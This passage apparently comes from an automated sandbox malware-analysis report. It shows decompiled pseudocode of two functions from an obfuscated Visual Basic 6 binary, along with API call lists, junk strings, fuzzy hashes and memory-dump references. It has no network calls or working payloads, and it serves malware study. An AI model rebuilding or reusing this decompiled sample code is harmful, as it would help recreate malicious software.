				char* _v108;
				char _v116;
				void* _v120;
				signed int _v124;
				void* _v128;
				signed int _v132;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				intOrPtr* _v160;
				signed int _v164;
				signed int _v168;
				intOrPtr* _v172;
				signed int _v176;
				intOrPtr* _v180;
				signed int _v184;
				intOrPtr* _v188;
				signed int _v192;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				signed int* _t187;
				short _t190;
				char* _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				char* _t207;
				signed int _t211;
				signed int _t224;
				signed int _t229;
				char* _t234;
				signed int _t238;
				signed int _t247;
				signed int _t252;
				void* _t301;
				intOrPtr _t302;
				intOrPtr _t322;

				_t302 = _t301 - 0xc;
				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t302;
				L00401350();
				_v16 = _t302;
				_v12 = 0x401298;
				L004014E2();
				_t187 = _a28;
				 *_t187 =  *_t187 & 0x00000000;
				_t322 =  *0x401294;
				asm("fcomp dword [0x401290]");
				asm("fnstsw ax");
				asm("sahf");
				if( *_t187 < 0) {
					_v76 = 0x80020004;
					_v84 = 0xa;
					_push( &_v84);
					L0040148E();
					_v32 = _t322;
					L0040157E();
					if( *0x4223fc != 0) {
						_v160 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v160 = 0x4223fc;
					}
					_v120 =  *_v160;
					_t247 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t247;
					if(_v124 >= 0) {
						_v164 = _v164 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v164 = _t247;
					}
					_v128 = _v68;
					_t252 =  *((intOrPtr*)( *_v128 + 0xd0))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t252;
					if(_v132 >= 0) {
						_v168 = _v168 & 0x00000000;
					} else {
						_push(0xd0);
						_push(0x403c48);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v168 = _t252;
					}
					_v144 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				_push( &_v84);
				L00401488();
				_v108 = L"skuddermudderets";
				_v116 = 0x8008;
				_push( &_v84);
				_t190 =  &_v116;
				_push(_t190);
				L0040158A();
				_v120 = _t190;
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v172 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v172 = 0x422010;
					}
					_t234 =  &_v68;
					L00401566();
					_v120 = _t234;
					_t238 =  *((intOrPtr*)( *_v120 + 0x150))(_v120,  &_v60, _t234,  *((intOrPtr*)( *((intOrPtr*)( *_v172)) + 0x300))( *_v172));
					asm("fclex");
					_v124 = _t238;
					if(_v124 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x150);
						_push(0x403c58);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v176 = _t238;
					}
					_push(_v36);
					_push(L"cheve");
					L00401518();
					L00401560();
					_push(_t238);
					_push(_v60);
					L00401518();
					L00401560();
					_push( &_v60);
					_push( &_v64);
					_push(2);
					L0040151E();
					_t302 = _t302 + 0xc;
					L0040156C();
					_push(0xa9);
					L00401482();
					L00401560();
				}
				_push( &_v84);
				L00401476();
				_t193 =  &_v84;
				_push(_t193);
				L0040147C();
				_v120 =  ~(0 | _t193 < 0x00000000);
				L0040157E();
				if(_v120 != 0) {
					if( *0x422010 != 0) {
						_v180 = 0x422010;
					} else {
						_push(0x422010);
						_push(0x40324c);
						L00401578();
						_v180 = 0x422010;
					}
					_t207 =  &_v68;
					L00401566();
					_v120 = _t207;
					_t211 =  *((intOrPtr*)( *_v120 + 0x110))(_v120,  &_v60, _t207,  *((intOrPtr*)( *((intOrPtr*)( *_v180)) + 0x30c))( *_v180));
					asm("fclex");
					_v124 = _t211;
					if(_v124 >= 0) {
						_v184 = _v184 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x403cc4);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v184 = _t211;
					}
					_v148 = _v60;
					_v60 = _v60 & 0x00000000;
					_v76 = _v148;
					_v84 = 8;
					_push(0xbf);
					_push( &_v84);
					_push( &_v100);
					L00401470();
					_push( &_v100);
					L004014DC();
					L00401560();
					L0040156C();
					_push( &_v100);
					_push( &_v84);
					_push(2);
					L0040153C();
					if( *0x4223fc != 0) {
						_v188 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v188 = 0x4223fc;
					}
					_v120 =  *_v188;
					_t224 =  *((intOrPtr*)( *_v120 + 0x14))(_v120,  &_v68);
					asm("fclex");
					_v124 = _t224;
					if(_v124 >= 0) {
						_v192 = _v192 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v120);
						_push(_v124);
						L00401572();
						_v192 = _t224;
					}
					_v128 = _v68;
					_t229 =  *((intOrPtr*)( *_v128 + 0xf8))(_v128,  &_v60);
					asm("fclex");
					_v132 = _t229;
					if(_v132 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x403c48);
						_push(_v128);
						_push(_v132);
						L00401572();
						_v196 = _t229;
					}
					_v152 = _v60;
					_v60 = _v60 & 0x00000000;
					L00401560();
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v200 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v200 = 0x422010;
				}
				_t198 =  &_v68;
				L00401566();
				_v120 = _t198;
				_t202 =  *((intOrPtr*)( *_v120 + 0xa0))(_v120,  &_v60, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x300))( *_v200));
				asm("fclex");
				_v124 = _t202;
				if(_v124 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0xa0);
					_push(0x403c58);
					_push(_v120);
					_push(_v124);
					L00401572();
					_v204 = _t202;
				}
				_t203 = _v60;
				_v156 = _t203;
				_v60 = _v60 & 0x00000000;
				L00401560();
				L0040156C();
				asm("wait");
				_push(0x41fc6f);
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				L00401554();
				return _t203;
			}

0x0041f6c0
0x0041f6c3
0x0041f6ce
0x0041f6cf
0x0041f6db
0x0041f6e3
0x0041f6e6
0x0041f6f3
0x0041f6f8
0x0041f6fb
0x0041f6fe
0x0041f704
0x0041f70a
0x0041f70c
0x0041f70d
0x0041f713
0x0041f71a
0x0041f724
0x0041f725
0x0041f72a
0x0041f730
0x0041f73c
0x0041f759
0x0041f73e
0x0041f73e
0x0041f743
0x0041f748
0x0041f74d
0x0041f74d
0x0041f76b
0x0041f77a
0x0041f77d
0x0041f77f
0x0041f786
0x0041f7a2
0x0041f788
0x0041f788
0x0041f78a
0x0041f78f
0x0041f792
0x0041f795
0x0041f79a
0x0041f79a
0x0041f7ac
0x0041f7bb
0x0041f7c1
0x0041f7c3
0x0041f7ca
0x0041f7e9
0x0041f7cc
0x0041f7cc
0x0041f7d1
0x0041f7d6
0x0041f7d9
0x0041f7dc
0x0041f7e1
0x0041f7e1
0x0041f7f3
0x0041f7f9
0x0041f806
0x0041f80e
0x0041f80e
0x0041f816
0x0041f817
0x0041f81c
0x0041f823
0x0041f82d
0x0041f82e
0x0041f831
0x0041f832
0x0041f837
0x0041f83e
0x0041f849
0x0041f856
0x0041f873
0x0041f858
0x0041f858
0x0041f85d
0x0041f862
0x0041f867
0x0041f867
0x0041f897
0x0041f89b
0x0041f8a0
0x0041f8af
0x0041f8b5
0x0041f8b7
0x0041f8be
0x0041f8dd
0x0041f8c0
0x0041f8c0
0x0041f8c5
0x0041f8ca
0x0041f8cd
0x0041f8d0
0x0041f8d5
0x0041f8d5
0x0041f8e4
0x0041f8e7
0x0041f8ec
0x0041f8f6
0x0041f8fb
0x0041f8fc
0x0041f8ff
0x0041f909
0x0041f911
0x0041f915
0x0041f916
0x0041f918
0x0041f91d
0x0041f923
0x0041f928
0x0041f92d
0x0041f937
0x0041f937
0x0041f93f
0x0041f940
0x0041f945
0x0041f948
0x0041f949
0x0041f958
0x0041f95f
0x0041f96a
0x0041f977
0x0041f994
0x0041f979
0x0041f979
0x0041f97e
0x0041f983
0x0041f988
0x0041f988
0x0041f9b8
0x0041f9bc
0x0041f9c1
0x0041f9d0
0x0041f9d6
0x0041f9d8
0x0041f9df
0x0041f9fe
0x0041f9e1
0x0041f9e1
0x0041f9e6
0x0041f9eb
0x0041f9ee
0x0041f9f1
0x0041f9f6
0x0041f9f6
0x0041fa08
0x0041fa0e
0x0041fa18
0x0041fa1b
0x0041fa22
0x0041fa2a
0x0041fa2e
0x0041fa2f
0x0041fa37
0x0041fa38
0x0041fa42
0x0041fa4a
0x0041fa52
0x0041fa56
0x0041fa57
0x0041fa59
0x0041fa68
0x0041fa85
0x0041fa6a
0x0041fa6a
0x0041fa6f
0x0041fa74
0x0041fa79
0x0041fa79
0x0041fa97
0x0041faa6
0x0041faa9
0x0041faab
0x0041fab2
0x0041face
0x0041fab4
0x0041fab4
0x0041fab6
0x0041fabb
0x0041fabe
0x0041fac1
0x0041fac6
0x0041fac6
0x0041fad8
0x0041fae7
0x0041faed
0x0041faef
0x0041faf6
0x0041fb15
0x0041faf8
0x0041faf8
0x0041fafd
0x0041fb02
0x0041fb05
0x0041fb08
0x0041fb0d
0x0041fb0d
0x0041fb1f
0x0041fb25
0x0041fb32
0x0041fb3a
0x0041fb3a
0x0041fb46
0x0041fb63
0x0041fb48
0x0041fb48
0x0041fb4d
0x0041fb52
0x0041fb57
0x0041fb57
0x0041fb87
0x0041fb8b
0x0041fb90
0x0041fb9f
0x0041fba5
0x0041fba7
0x0041fbae
0x0041fbcd
0x0041fbb0
0x0041fbb0
0x0041fbb5
0x0041fbba
0x0041fbbd
0x0041fbc0
0x0041fbc5
0x0041fbc5
0x0041fbd4
0x0041fbd7
0x0041fbdd
0x0041fbea
0x0041fbf2
0x0041fbf7
0x0041fbf8
0x0041fc41
0x0041fc49
0x0041fc51
0x0041fc59
0x0041fc61
0x0041fc69
0x0041fc6e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F6DB
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F6F3
#593.MSVBVM60(0000000A), ref: 0041F725
__vbaFreeVar.MSVBVM60(0000000A), ref: 0041F730
__vbaNew2.MSVBVM60(00403C38,004223FC,0000000A), ref: 0041F748
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 0041F795
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,000000D0), ref: 0041F7DC
__vbaStrMove.MSVBVM60(00000000,?,00403C48,000000D0), ref: 0041F806
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,000000D0), ref: 0041F80E
#670.MSVBVM60(?,?,?,?,?,00401356), ref: 0041F817
__vbaVarTstEq.MSVBVM60(00008008,?), ref: 0041F832
__vbaFreeVar.MSVBVM60(00008008,?), ref: 0041F83E
__vbaNew2.MSVBVM60(0040324C,00422010,00008008,?), ref: 0041F862
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F89B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,00000150), ref: 0041F8D0
__vbaStrCat.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F8EC
__vbaStrMove.MSVBVM60(cheve,?,?,?,?,?,?,?,?,?,?,?,?,?,00008008,?), ref: 0041F8F6
__vbaStrCat.MSVBVM60(?,00000000,cheve,?), ref: 0041F8FF
__vbaStrMove.MSVBVM60(?,00000000,cheve,?), ref: 0041F909
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,cheve,?), ref: 0041F918
__vbaFreeObj.MSVBVM60(?,?,00401356), ref: 0041F923
#525.MSVBVM60(000000A9,?,?,00401356), ref: 0041F92D
__vbaStrMove.MSVBVM60(000000A9,?,?,00401356), ref: 0041F937
#610.MSVBVM60(?,00008008,?), ref: 0041F940
#557.MSVBVM60(?,?,00008008,?), ref: 0041F949
__vbaFreeVar.MSVBVM60(?,?,00008008,?), ref: 0041F95F
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,00008008,?), ref: 0041F983
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F9BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000110), ref: 0041F9F1
#515.MSVBVM60(?,00000008,000000BF,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041FA2F
__vbaStrVarMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FA38
__vbaStrMove.MSVBVM60(?,?,00000008,000000BF), ref: 0041FA42
__vbaFreeObj.MSVBVM60(?,?,00000008,000000BF), ref: 0041FA4A
__vbaFreeVarList.MSVBVM60(00000002,00000008,?,?,?,00000008,000000BF), ref: 0041FA59
__vbaNew2.MSVBVM60(00403C38,004223FC,?,?,00401356), ref: 0041FA74
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 0041FAC1
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,000000F8), ref: 0041FB08
__vbaStrMove.MSVBVM60(00000000,?,00403C48,000000F8), ref: 0041FB32
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,000000F8), ref: 0041FB3A
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,00008008,?), ref: 0041FB52
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041FB8B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C58,000000A0), ref: 0041FBC0
__vbaStrMove.MSVBVM60(00000000,?,00403C58,000000A0), ref: 0041FBEA
__vbaFreeObj.MSVBVM60(00000000,?,00403C58,000000A0), ref: 0041FBF2
__vbaFreeStr.MSVBVM60(0041FC6F), ref: 0041FC41
__vbaFreeStr.MSVBVM60(0041FC6F), ref: 0041FC49

Strings

skuddermudderets, xrefs: 0041F81C
cheve, xrefs: 0041F8E7

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$Move$CheckHresult$New2$List$#515#525#557#593#610#670ChkstkCopy
String ID: cheve$skuddermudderets
API String ID: 4055753005-3782447816
Opcode ID: a22c4ef3b3e7f739f145ece3a7c4d71f3d90419d67effef9d417b48c44bbac0f
Instruction ID: da2e18fdcae08be97362f6dfa706629e6d84a92a3f1f3dc21a04abba10704710
Opcode Fuzzy Hash: a22c4ef3b3e7f739f145ece3a7c4d71f3d90419d67effef9d417b48c44bbac0f
Instruction Fuzzy Hash: 33F1F771900218AFDB20EFA5DD45BDDBBB4BF44304F20017AE106BB2A1DB785A89DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF7A, Relevance: 87.8, APIs: 41, Strings: 9, Instructions: 340
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E0041FF7A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* _v32;
				void* _v36;
				intOrPtr _v40;
				short _v44;
				short _v48;
				char _v64;
				void* _v68;
				char _v72;
				signed int _v76;
				intOrPtr _v84;
				char _v92;
				char _v108;
				char* _v132;
				char _v140;
				void* _v144;
				char _v148;
				void* _v152;
				signed int _v156;
				void* _v160;
				signed int _v164;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr* _v220;
				signed int _v224;
				char* _t173;
				signed int _t177;
				short _t183;
				signed int _t187;
				short _t191;
				char* _t192;
				signed int _t196;
				char* _t204;
				signed int _t208;
				char* _t209;
				char* _t211;
				signed int _t217;
				signed int _t222;
				signed int _t229;
				signed int _t234;
				void* _t261;
				void* _t263;
				intOrPtr _t264;
				void* _t265;

				_t264 = _t263 - 0x10;
				 *[fs:0x0] = _t264;
				L00401350();
				_v20 = _t264;
				_v16 = 0x4012b8;
				_v12 = 0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401356, _t261);
				L004014E2();
				if( *0x422010 != 0) {
					_v184 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v184 = 0x422010;
				}
				_t173 =  &_v72;
				L00401566();
				_v152 = _t173;
				_t177 =  *((intOrPtr*)( *_v152 + 0x160))(_v152,  &_v76, _t173,  *((intOrPtr*)( *((intOrPtr*)( *_v184)) + 0x30c))( *_v184));
				asm("fclex");
				_v156 = _t177;
				if(_v156 >= 0) {
					_v188 = _v188 & 0x00000000;
				} else {
					_push(0x160);
					_push(0x403cc4);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v188 = _t177;
				}
				_v180 = _v76;
				_v76 = _v76 & 0x00000000;
				_v84 = _v180;
				_v92 = 9;
				_push( &_v92);
				_push( &_v108);
				L00401452();
				_v132 = L"DADAP";
				_v140 = 0x8008;
				_push( &_v108);
				_t183 =  &_v140;
				_push(_t183);
				L00401458();
				_v160 = _t183;
				L0040156C();
				_push( &_v108);
				_push( &_v92);
				_push(2);
				L0040153C();
				_t265 = _t264 + 0xc;
				if(_v160 != 0) {
					_push(0);
					L004014E8();
					_push( &_v64);
					_push(_a4);
					_push(0x403d18);
					L0040150C();
					_t265 = _t265 + 0xc;
				}
				_v84 = 0x3830;
				_v92 = 2;
				_t187 =  &_v92;
				_push(_t187);
				L00401446();
				L00401560();
				_push(_t187);
				_push(L"Rerefief");
				L0040144C();
				asm("sbb eax, eax");
				_v152 =  ~( ~_t187 + 1);
				L00401554();
				L0040157E();
				_t191 = _v152;
				if(_t191 != 0) {
					if( *0x4223fc != 0) {
						_v192 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v192 = 0x4223fc;
					}
					_v152 =  *_v192;
					_t229 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t229;
					if(_v156 >= 0) {
						_v196 = _v196 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v196 = _t229;
					}
					_v160 = _v72;
					_t234 =  *((intOrPtr*)( *_v160 + 0xc8))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t234;
					if(_v164 >= 0) {
						_v200 = _v200 & 0x00000000;
					} else {
						_push(0xc8);
						_push(0x403c48);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v200 = _t234;
					}
					_t191 = _v144;
					_v44 = _t191;
					L0040156C();
					_push(L"HOLLO");
					_push(L"Regular6");
					_push(L"Azulmic");
					_push(L"bedrageriets");
					L004014B2();
				}
				L00401440();
				_t192 =  &_v72;
				L00401566();
				_v152 = _t192;
				_t196 =  *((intOrPtr*)( *_v152 + 0x1c))(_v152,  &_v148, _t192, _t191);
				asm("fclex");
				_v156 = _t196;
				if(_v156 >= 0) {
					_v204 = _v204 & 0x00000000;
				} else {
					_push(0x1c);
					_push(0x403fac);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v204 = _t196;
				}
				_v160 =  ~(0 | _v148 - 0x007560d5 >= 0x00000000);
				L0040156C();
				if(_v160 != 0) {
					_push(L"bopl");
					_push(L"Verdantly");
					L00401518();
					L00401560();
					if( *0x4223fc != 0) {
						_v208 = 0x4223fc;
					} else {
						_push(0x4223fc);
						_push(0x403c38);
						L00401578();
						_v208 = 0x4223fc;
					}
					_v152 =  *_v208;
					_t217 =  *((intOrPtr*)( *_v152 + 0x14))(_v152,  &_v72);
					asm("fclex");
					_v156 = _t217;
					if(_v156 >= 0) {
						_v212 = _v212 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x403c28);
						_push(_v152);
						_push(_v156);
						L00401572();
						_v212 = _t217;
					}
					_v160 = _v72;
					_t222 =  *((intOrPtr*)( *_v160 + 0x140))(_v160,  &_v144);
					asm("fclex");
					_v164 = _t222;
					if(_v164 >= 0) {
						_v216 = _v216 & 0x00000000;
					} else {
						_push(0x140);
						_push(0x403c48);
						_push(_v160);
						_push(_v164);
						L00401572();
						_v216 = _t222;
					}
					_v48 = _v144;
					L0040156C();
				}
				if( *0x422010 != 0) {
					_v220 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x40324c);
					L00401578();
					_v220 = 0x422010;
				}
				_t204 =  &_v72;
				L00401566();
				_v152 = _t204;
				_t208 =  *((intOrPtr*)( *_v152 + 0x100))(_v152,  &_v76, _t204,  *((intOrPtr*)( *((intOrPtr*)( *_v220)) + 0x308))( *_v220));
				asm("fclex");
				_v156 = _t208;
				if(_v156 >= 0) {
					_v224 = _v224 & 0x00000000;
				} else {
					_push(0x100);
					_push(0x403cc4);
					_push(_v152);
					_push(_v156);
					L00401572();
					_v224 = _t208;
				}
				_push(0);
				_push(0);
				_push(_v76);
				_t209 =  &_v92;
				_push(_t209);
				L00401500();
				_push(_t209);
				L00401506();
				_v40 = _t209;
				_push( &_v76);
				_t211 =  &_v72;
				_push(_t211);
				_push(2);
				L00401512();
				L0040157E();
				_push(0x420550);
				L00401554();
				L00401554();
				L0040157E();
				return _t211;
			}

0x0041ff7d
0x0041ff8c
0x0041ff98
0x0041ffa0
0x0041ffa3
0x0041ffaa
0x0041ffb1
0x0041ffc0
0x0041ffc9
0x0041ffd5
0x0041fff2
0x0041ffd7
0x0041ffd7
0x0041ffdc
0x0041ffe1
0x0041ffe6
0x0041ffe6
0x00420016
0x0042001a
0x0042001f
0x00420037
0x0042003d
0x0042003f
0x0042004c
0x00420071
0x0042004e
0x0042004e
0x00420053
0x00420058
0x0042005e
0x00420064
0x00420069
0x00420069
0x0042007b
0x00420081
0x0042008b
0x0042008e
0x00420098
0x0042009c
0x0042009d
0x004200a2
0x004200a9
0x004200b6
0x004200b7
0x004200bd
0x004200be
0x004200c3
0x004200cd
0x004200d5
0x004200d9
0x004200da
0x004200dc
0x004200e1
0x004200ed
0x004200ef
0x004200f1
0x004200f9
0x004200fa
0x004200fd
0x00420102
0x00420107
0x00420107
0x0042010a
0x00420111
0x00420118
0x0042011b
0x0042011c
0x00420126
0x0042012b
0x0042012c
0x00420131
0x00420138
0x0042013d
0x00420147
0x0042014f
0x00420154
0x0042015d
0x0042016a
0x00420187
0x0042016c
0x0042016c
0x00420171
0x00420176
0x0042017b
0x0042017b
0x00420199
0x004201b1
0x004201b4
0x004201b6
0x004201c3
0x004201e5
0x004201c5
0x004201c5
0x004201c7
0x004201cc
0x004201d2
0x004201d8
0x004201dd
0x004201dd
0x004201ef
0x0042020a
0x00420210
0x00420212
0x0042021f
0x00420244
0x00420221
0x00420221
0x00420226
0x0042022b
0x00420231
0x00420237
0x0042023c
0x0042023c
0x0042024b
0x00420252
0x00420259
0x0042025e
0x00420263
0x00420268
0x0042026d
0x00420272
0x00420272
0x00420277
0x0042027d
0x00420281
0x00420286
0x004202a1
0x004202a4
0x004202a6
0x004202b3
0x004202d5
0x004202b5
0x004202b5
0x004202b7
0x004202bc
0x004202c2
0x004202c8
0x004202cd
0x004202cd
0x004202ed
0x004202f7
0x00420305
0x0042030b
0x00420310
0x00420315
0x0042031f
0x0042032b
0x00420348
0x0042032d
0x0042032d
0x00420332
0x00420337
0x0042033c
0x0042033c
0x0042035a
0x00420372
0x00420375
0x00420377
0x00420384
0x004203a6
0x00420386
0x00420386
0x00420388
0x0042038d
0x00420393
0x00420399
0x0042039e
0x0042039e
0x004203b0
0x004203cb
0x004203d1
0x004203d3
0x004203e0
0x00420405
0x004203e2
0x004203e2
0x004203e7
0x004203ec
0x004203f2
0x004203f8
0x004203fd
0x004203fd
0x00420413
0x0042041a
0x0042041a
0x00420426
0x00420443
0x00420428
0x00420428
0x0042042d
0x00420432
0x00420437
0x00420437
0x00420467
0x0042046b
0x00420470
0x00420488
0x0042048e
0x00420490
0x0042049d
0x004204c2
0x0042049f
0x0042049f
0x004204a4
0x004204a9
0x004204af
0x004204b5
0x004204ba
0x004204ba
0x004204c9
0x004204cb
0x004204cd
0x004204d0
0x004204d3
0x004204d4
0x004204dc
0x004204dd
0x004204e2
0x004204e8
0x004204e9
0x004204ec
0x004204ed
0x004204ef
0x004204fa
0x004204ff
0x0042053a
0x00420542
0x0042054a
0x0042054f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041FF98
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041FFC9
__vbaNew2.MSVBVM60(0040324C,00422010,?,?,?,?,00401356), ref: 0041FFE1
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042001A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000160), ref: 00420064
#575.MSVBVM60(?,00000009), ref: 0042009D
__vbaVarTstNe.MSVBVM60(00008008,?,?,00000009), ref: 004200BE
__vbaFreeObj.MSVBVM60(00008008,?,?,00000009), ref: 004200CD
__vbaFreeVarList.MSVBVM60(00000002,00000009,?,00008008,?,?,00000009), ref: 004200DC
__vbaOnError.MSVBVM60(00000000,?,?,00401356), ref: 004200F1
__vbaPrintObj.MSVBVM60(00403D18,00000000,?,00000000,?,?,00401356), ref: 00420102
#651.MSVBVM60(00000002), ref: 0042011C
__vbaStrMove.MSVBVM60(00000002), ref: 00420126
__vbaStrCmp.MSVBVM60(Rerefief,00000000,00000002), ref: 00420131
__vbaFreeStr.MSVBVM60(Rerefief,00000000,00000002), ref: 00420147
__vbaFreeVar.MSVBVM60(Rerefief,00000000,00000002), ref: 0042014F
__vbaNew2.MSVBVM60(00403C38,004223FC,Rerefief,00000000,00000002), ref: 00420176
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 004201D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,000000C8), ref: 00420237
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,000000C8), ref: 00420259
#690.MSVBVM60(bedrageriets,Azulmic,Regular6,HOLLO), ref: 00420272
#685.MSVBVM60(Rerefief,00000000,00000002), ref: 00420277
__vbaObjSet.MSVBVM60(?,00000000,Rerefief,00000000,00000002), ref: 00420281
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403FAC,0000001C), ref: 004202C8
__vbaFreeObj.MSVBVM60(00000000,?,00403FAC,0000001C), ref: 004202F7
__vbaStrCat.MSVBVM60(Verdantly,bopl), ref: 00420315
__vbaStrMove.MSVBVM60(Verdantly,bopl), ref: 0042031F
__vbaNew2.MSVBVM60(00403C38,004223FC,Verdantly,bopl), ref: 00420337
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C28,00000014), ref: 00420399
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C48,00000140), ref: 004203F8
__vbaFreeObj.MSVBVM60(00000000,?,00403C48,00000140), ref: 0042041A
__vbaNew2.MSVBVM60(0040324C,00422010), ref: 00420432
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042046B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CC4,00000100), ref: 004204B5
__vbaLateIdCallLd.MSVBVM60(00000002,?,00000000,00000000), ref: 004204D4
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,00401356), ref: 004204DD
__vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,00401356), ref: 004204EF
__vbaFreeVar.MSVBVM60(?,?,00000000,?,?,?,?,?,?,00401356), ref: 004204FA
__vbaFreeStr.MSVBVM60(00420550,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042053A
__vbaFreeStr.MSVBVM60(00420550,?,?,00000000,?,?,?,?,?,?,00401356), ref: 00420542
__vbaFreeVar.MSVBVM60(00420550,?,?,00000000,?,?,?,?,?,?,00401356), ref: 0042054A

Strings

Verdantly, xrefs: 00420310
Rerefief, xrefs: 0042012C
bedrageriets, xrefs: 0042026D
HOLLO, xrefs: 0042025E
bopl, xrefs: 0042030B
Regular6, xrefs: 00420263
Azulmic, xrefs: 00420268
DADAP, xrefs: 004200A2
08, xrefs: 0042010A

Memory Dump Source

Source File: 00000001.00000002.870203334.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.870198729.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.870226387.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.870232976.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$ListMove$#575#651#685#690CallChkstkCopyErrorLatePrint
String ID: 08$Azulmic$DADAP$HOLLO$Regular6$Rerefief$Verdantly$bedrageriets$bopl
API String ID: 2545346589-1508429672
Opcode ID: d32ef770a1456839c708836f2bdeea1eb0f2cc07b4b2a62d2c13a18590c919d3
Instruction ID: 630ddaf34b19bf9a621435b037d71b5e25c57e12d049f0b46be19968baffe3df
Opcode Fuzzy Hash: d32ef770a1456839c708836f2bdeea1eb0f2cc07b4b2a62d2c13a18590c919d3
Instruction Fuzzy Hash: 6DF1F971A00228AFDB10DFA1DD46FDDB7B4BF04705F5040AAE509B72A2DB785A85CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00420577, Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 206
COMMON
